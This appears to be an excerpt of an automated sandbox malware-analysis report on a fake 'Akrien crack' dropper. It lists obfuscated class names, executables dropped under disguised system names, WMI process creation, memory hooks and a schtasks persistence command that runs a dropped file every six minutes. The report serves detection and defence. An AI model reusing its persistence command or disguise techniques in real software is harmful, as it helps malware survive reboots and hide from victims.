            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TpSFP7fnJV099EZ6QF.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'kap6gXdh76VZAtsb2L7', 'FcNqpld20YMeENn94dA', 'bto8tEdXOtqkqAikywt', 'xdpP8cdEHQ1BIaWuJYN', 'Pr28ssdzL3SgCfQuRIH', 'ftDAvGBYp4N4wmyRmfa'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, IMxKL9TACBKEt4IJShy.csHigh entropy of concatenated method names: 'IjPTcJ2yve', 'Q7fT5Q4yby', 'aVQTiNZKZn', 'qlngspy5aaCfIv4YFH3', 'XkaEetyaYklXI6sPyu2', 'TosoxJyKHvrd1L8L7x9', 'JoQASDyiGeB5G8S3CLV', 'IkbLE0yUasNSLechgFb', 'hVMRRDyGceNq60xuh03', 'LwyM1Py4nGYYEnABYpD'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, Qwlb79I7RZAV2xNM4K2.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GTnP25bSK1MwrxZ9hGO', 'xwnsj7b5tpd6UkP6UOb', 'l79eCMba76dMiFgq6NM', 'jl6ddjbKe1CRYJlH5ww', 'ugaqG5biKDcbsbOj38b', 'aBqoI4bUEBMXMe7qqAa'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, rXs0YCIn5MVX9jwHFAG.csHigh entropy of concatenated method names: 'QMeI83LrNM', 'xBZ4eucJ2kbK3sTJLQ1', 'w098Iscdi9GYBtFBlxy', 'gMgOd0cY8MQwSwiygq1', 'jdNmwGc3sUVxeU5yE21', 'rgYC08cBGWm5aJY24EY', 'Q8WFg1clS2yesR6bMEI', 'pfI4uQc7JBd8mKoP4CX', 'svtIK281xy', 'ooUVjocvWqlSMalpBP8'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, KM9ntwe4d0JQOH9LDfn.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'DRB5vlFl7u', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TfwPTxUENEcUIJC4tM.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'LH2qy8uLC', 'kBDyGBJKmytMJLYwoYT', 'JE8KyKJiFuwP8NyAU5T', 'i5giYNJU5mO4prcpAA1', 'afucKiJGnwUZGFixkHZ', 'iKEe3YJuaTUI6rtR5b6'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, yQxUDoGjSN6MownrtR.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'zTSwDIJbU0JGcakdB0k', 'IIXdQAJyemQL03KV1la', 'cgpMZCJVbKRwWl2PNEw', 'Aoe25IJjAUyQL3Sh2kM', 'khbBS0JgtfcF5WSJdLD', 'HSEIeDJRFoWT44rF1HN'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, EJRVEyprgdxVpJXC3O.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'IC1fdwnAh', 'P7kLNlJpePgplP0tHGA', 'YIuGa0JIAQ3T5MHVNPJ', 'MZHBR1J6kBoC7EBRt1K', 'eitafUJwxDPHT5cAQWJ', 'jsBnyyJDvkyE7i31FKY'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, cupOOgmu6jCnlwctGXW.csHigh entropy of concatenated method names: '_223', 'TXxMxy6s3O3ciAtUXNR', 'qDTIiQ6PIHBA5BaiMp6', 'P5poB06pWjh5260SE8a', 'YhyvNQ6I9svyeJZ5f80', 'JWyrtd66BiLwrnKEW6n', 'zuxKEL6wt5XvJwGifSx', 'FW5OR06Di9BBjil9AR7', 'UrBNUZ68b9totyGipDg', 'S0qBYu61xjCbOoDRMVE'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, VMnMMmd6skwxkSRV6L0.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'bH1c420nxJ', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, NsqC7TmzaBcHs5P93Bq.csHigh entropy of concatenated method names: 'hVAhG4XxB9', 'GeohYYSUK5', 'C8vhXk9aAX', 'HLDuoT1tBh03PeZKdGX', 'ioY53J1TTPk6ebDvhgB', 'T3qTfw1u78OlrZaGsXy', 'cTu0dn1CZDShEZmZ5Mg', 'eBTDM81nBXW7vwicrnY', 'gxAagh1AQiGiJuFW0bx', 'uMa6e61QBOPbj82y6Kr'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, OxHtQZe0x2Kotq3yDoI.csHigh entropy of concatenated method names: 'tARYPl4Zq4', 'hbo9iInLhfmEwan3I9K', 'TxcZ7Dn45qZt8owHpbW', 'z2TdtGnkDFZemUTDLId', 'DceJh6n9twgeAurQ6ot', '_1fi', 'VeGG7XLMBV', '_676', 'IG9', 'mdP'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, A7NSCtIi9qOJ5eGf4IU.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'TWfj6HFEPV12SKcMA4O', 'fKrHupFz8AbIgIL9tL6', 'dZdWEOvYc6IJVPwqkMv', 'btRxRMv3llNDe6gKbnb', 'pxhll8vJ30F6Dp5DG3O', 'SZePEivdAP1aoiTxw48'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, wfvJRJmsvYgcdxD4n4s.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 's9n6n5DjpvcHomhhLsF', 'IcDbASDgAmCItHswTW1', 'VV817tDRYNSDD9vRFfk', 'Drcy7jDePJISl5aq6lR'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, j9T5G9TDKuGCN3ie2Mu.csHigh entropy of concatenated method names: 'ebeCcKw4RU', 'IWTg65PmDwBJJXSKSWA', 'NS23BgPOWF7G9U0DX5G', 'aHgBkFPZnrOhEQtMoEc', 'pZ7tDIPodoWkNkubUkP', 'mJGQTKPM4T2GrJhgXu4', 'hdoCJ1e9vg', 'Eo9CH3xZw0', 'vyJCVJmBAw', 'DD1CbhdKeW'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, rJnOUEIu4FQpGUR7CcZ.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'MST3wCWxtbQj0rZqOrP', 'l1Eek7WkL1wFWVDLhLg', 'x1ao1hW9Iq6wrCLPFQu', 'wksqHWWL8bEB4bQrS8o', 'fcedxuW4kNg48gjfL63', 'xKOPlXWSfmtC6w6cEmt'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, WAeOCAeZKTBo5c1jjgw.csHigh entropy of concatenated method names: 'TQ1XQlRcL2', '_1kO', '_9v4', '_294', 'ABlX4Jj3cg', 'euj', 'oJtXvKpFl4', 'uobXc6jCYq', 'o87', 'ipBX54uqmn'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, VdJwLKTVvdS3WU3eRl4.csHigh entropy of concatenated method names: 'IljL9PMxKL', 'lCBLwKEt4I', 'gKdmjwR1O4QuGx6cilL', 'x2Y7xPRHS1PPOwdvJMK', 'dwL1VIRDyo3A1TjDfDK', 'VAcrbdR8FEjqfBTVFpn', 'vcvt64Rrn4hnqoIAwb9', 'vGtyelRx4nrrjYivOXo', 'VZeuInRkfrtXVqh9RcQ', 'SbiXQpR9mpjMVO1kZU7'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, KLU84FLdtog4Jnardem.csHigh entropy of concatenated method names: 'jpPa2TNOyC', 'gqDBuVHPv3ccaxX2QBH', 'DnRQxLHp8eNkRG8GQte', 'U6BgUNH0eLnlpVJUxIv', 'RjExutHskOMKhtmcFBF', 'KolhnTmhpW', 'XkPhpwkrBC', 'J3thEqrI3r', 'V7ThUdrPC7', 'YlFhNBdWKX'
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, dcdj5kTTpP3o9ZEKVF4.csHigh entropy of concatenated method names: 'hUxTKkJJWJ', 'rVYTy02ELa', 'RNYTZx3739', 'OTNT7SKTsh', 'bDPTOTdoEs', 'zV0TobcytH', 'vL3rYBVs6kNw1XJNKSk', 'aGdRuuVPIOyd89tRoRF', 's5SDW9VeyEWScdqaf7n', 'Y2LmTuV0l7B3pfYB0fb'

            Persistence and Installation Behavior

            barindex
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Browserfont\services.exeJump to dropped file
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\ProgramData\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\AkrienAntiLeak\SgrmBroker.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Browserfont\services.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Recovery\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Browserfont\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\Public\Videos\cmd.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeFile created: C:\Browserfont\refdhcp.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Browserfont\Registry.exeJump to dropped file
            Source: C:\Users\user\Desktop\RFAwChXSve.exeFile created: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\Default\Saved Games\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\user\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\RuntimeBroker.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\ProgramData\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\user\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Windows\en-US\RuntimeBroker.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\version-d6abc3b106a04c5c-rbxInstallerPkgManifest[1].txtJump to behavior

            Boot Survival

            barindex
            Source: C:\Browserfont\refdhcp.exeFile created: C:\Users\user\RDMwYUvZPK.exeJump to dropped file
            Source: C:\Browserfont\refdhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RDMwYUvZPKR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Saved Games\RDMwYUvZPK.exe'" /f

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeMemory written: PID: 7292 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeMemory written: PID: 7292 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeMemory written: PID: 7292 base: 7FFE2238000D value: E9 BB CB EB FF Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeMemory written: PID: 7292 base: 7FFE2223CBC0 value: E9 5A 34 14 00 Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\RFAwChXSve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Browserfont\refdhcp.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exeProcess information set: NOOPENFILEERRORBOX
